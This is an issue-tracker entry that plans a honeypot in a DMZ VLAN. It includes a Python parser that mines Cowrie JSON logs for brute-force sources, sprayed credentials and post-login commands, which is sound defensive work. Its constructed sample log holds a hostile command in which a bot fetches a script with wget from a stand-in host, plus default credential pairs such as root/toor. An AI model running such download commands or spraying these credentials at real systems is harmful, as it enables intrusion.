DMZ + honeypot for bot pattern capture #58

Open
opened 2026-05-30 09:46:27 -07:00 by pyr0ball · 0 comments

Goal

Set up a DMZ VLAN and honeypot to capture inbound bot/scanner patterns for Turnstone log analysis.

Context

Router (Untangle/Arista at 10.1.10.13) now has IoT (VLAN 20) and Cameras (VLAN 30) VLANs active. Next step is to add a DMZ VLAN with a honeypot container that logs connection attempts — feeding those patterns back into Turnstone glean rules.

Tasks

  • Add DMZ VLAN (VLAN 40, 10.10.40.0/24) on the Untangle router
  • Deploy honeypot container (e.g. cowrie or opencanary) on Navi in the DMZ
  • Add port-forward rules to expose honeypot ports to WAN (22, 23, 80, 443, 3389)
  • Add Turnstone log source for honeypot container
  • Add glean patterns for honeypot hit events
  • Consider firewall rules to prevent DMZ from reaching main LAN

Notes

  • Untangle filter rules are default-allow for internal traffic — explicit block rules needed for DMZ→LAN
  • Use unifi-cli.sh for UniFi side if a DMZ WiFi SSID is needed
  • Untangle UI automatable via Playwright session (credentials in memory)
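Added example for the "Turnstone log source" and "glean patterns for honeypot hit events" tasks above. This is not Turnstone's or Cowrie's own code; it assumes the honeypot is Cowrie running with its JSON log output (one JSON object per line, with the `eventid`, `src_ip`, `dst_port`, `username`, `password`, `input` and `timestamp` fields Cowrie emits), and the sample log lines are constructed for illustration. It pulls out the three things a glean rule would key on: which sources are brute-forcing (N failed logins in a sliding window), which credentials the bots are spraying, and what they run after a canned "success". Two checks worth doing before trusting the output on the real box: Cowrie listens on 2222/2223 inside the container, so `dst_port` in the log is the container port, not the WAN-facing 22/23 from the port-forward task; and confirm the Untangle forward only rewrites the destination, otherwise every hit will carry the router's address as `src_ip`.

```python
"""Extract bot/scanner patterns from Cowrie JSON event logs.

Added example (not Turnstone or Cowrie code). Assumes Cowrie's JSON output
plugin; SAMPLE_LOG is constructed, not captured traffic.
"""
import json
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample: one SSH scanner (203.0.113.7) fails five logins in
# five seconds, "succeeds", and runs a command; one telnet probe from
# 198.51.100.4; one malformed line that a parser must survive.
SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","src_ip":"203.0.113.7","src_port":51000,"dst_ip":"10.10.40.10","dst_port":2222,"session":"s1","protocol":"ssh","timestamp":"2026-06-01T00:00:01.000000Z","sensor":"dmz-hp"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","src_ip":"203.0.113.7","session":"s1","timestamp":"2026-06-01T00:00:02.000000Z","sensor":"dmz-hp"}
{"eventid":"cowrie.login.failed","username":"root","password":"password","src_ip":"203.0.113.7","session":"s1","timestamp":"2026-06-01T00:00:03.000000Z","sensor":"dmz-hp"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","src_ip":"203.0.113.7","session":"s1","timestamp":"2026-06-01T00:00:04.000000Z","sensor":"dmz-hp"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","src_ip":"203.0.113.7","session":"s1","timestamp":"2026-06-01T00:00:05.000000Z","sensor":"dmz-hp"}
{"eventid":"cowrie.login.failed","username":"root","password":"toor","src_ip":"203.0.113.7","session":"s1","timestamp":"2026-06-01T00:00:06.000000Z","sensor":"dmz-hp"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty","src_ip":"203.0.113.7","session":"s1","timestamp":"2026-06-01T00:00:07.000000Z","sensor":"dmz-hp"}
{"eventid":"cowrie.command.input","input":"uname -a; wget http://203.0.113.9/x.sh","src_ip":"203.0.113.7","session":"s1","timestamp":"2026-06-01T00:00:08.000000Z","sensor":"dmz-hp"}
{"eventid":"cowrie.session.connect","src_ip":"198.51.100.4","src_port":40000,"dst_ip":"10.10.40.10","dst_port":2223,"session":"s2","protocol":"telnet","timestamp":"2026-06-01T00:10:00.000000Z","sensor":"dmz-hp"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","src_ip":"198.51.100.4","session":"s2","timestamp":"2026-06-01T00:10:01.000000Z","sensor":"dmz-hp"}
not json at all
"""

LOGIN_EVENTS = ("cowrie.login.failed", "cowrie.login.success")


def parse_events(text):
    """Parse newline-delimited Cowrie JSON. Returns (events, malformed_count).

    Malformed or incomplete lines are counted and skipped rather than
    aborting the run; an attacker-facing log must never wedge the pipeline.
    """
    events, bad = [], 0
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
            # Cowrie writes ISO-8601 with a trailing Z; normalise for fromisoformat.
            ev["_ts"] = datetime.fromisoformat(ev["timestamp"].replace("Z", "+00:00"))
            ev["eventid"]
        except (ValueError, KeyError, TypeError):
            bad += 1
            continue
        events.append(ev)
    return events, bad


def brute_force_sources(events, threshold=5, window=timedelta(minutes=5)):
    """Source IPs with at least `threshold` failed logins in any `window`."""
    fails = defaultdict(list)
    for ev in events:
        if ev["eventid"] == "cowrie.login.failed":
            fails[ev.get("src_ip", "?")].append(ev["_ts"])
    flagged = set()
    for ip, times in fails.items():
        times.sort()
        start = 0
        for end in range(len(times)):            # sliding window over sorted times
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged.add(ip)
                break
    return sorted(flagged)


def summarize(events):
    """Per-source view: container ports hit, protocols, credentials, commands."""
    per_src = defaultdict(lambda: {
        "sessions": set(), "dst_ports": set(), "protocols": set(),
        "failed": 0, "success": 0, "creds": Counter(), "commands": [],
    })
    for ev in events:
        s = per_src[ev.get("src_ip", "?")]
        eid = ev["eventid"]
        s["sessions"].add(ev.get("session"))
        if eid == "cowrie.session.connect":
            s["dst_ports"].add(ev.get("dst_port"))
            s["protocols"].add(ev.get("protocol"))
        elif eid in LOGIN_EVENTS:
            s["creds"][(ev.get("username"), ev.get("password"))] += 1
            s["failed" if eid.endswith("failed") else "success"] += 1
        elif eid == "cowrie.command.input":
            s["commands"].append(ev.get("input", ""))
    return per_src


def top_credentials(events, n=3):
    """Most-sprayed (username, password) pairs across all sources."""
    c = Counter((ev.get("username"), ev.get("password"))
                for ev in events if ev["eventid"] in LOGIN_EVENTS)
    return c.most_common(n)


if __name__ == "__main__":
    evs, bad = parse_events(SAMPLE_LOG)
    print(f"{len(evs)} events parsed, {bad} malformed line(s) skipped")
    print("brute-force sources:", brute_force_sources(evs))
    for ip, s in summarize(evs).items():
        print(ip, sorted(s["dst_ports"]), s["failed"], "failed,",
              s["success"], "success,", s["commands"])
    print("top credentials:", top_credentials(evs))
```

The window and threshold are deliberately parameters: on a WAN-exposed SSH honeypot five failures in five minutes will flag essentially every source, so the knob that separates "background scanner" from "targeted" is something to tune against a week of real data before it becomes a rule.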
pyr0ball added this to the v1.0 milestone 2026-06-01 15:10:01 -07:00
Reference: Circuit-Forge/turnstone#58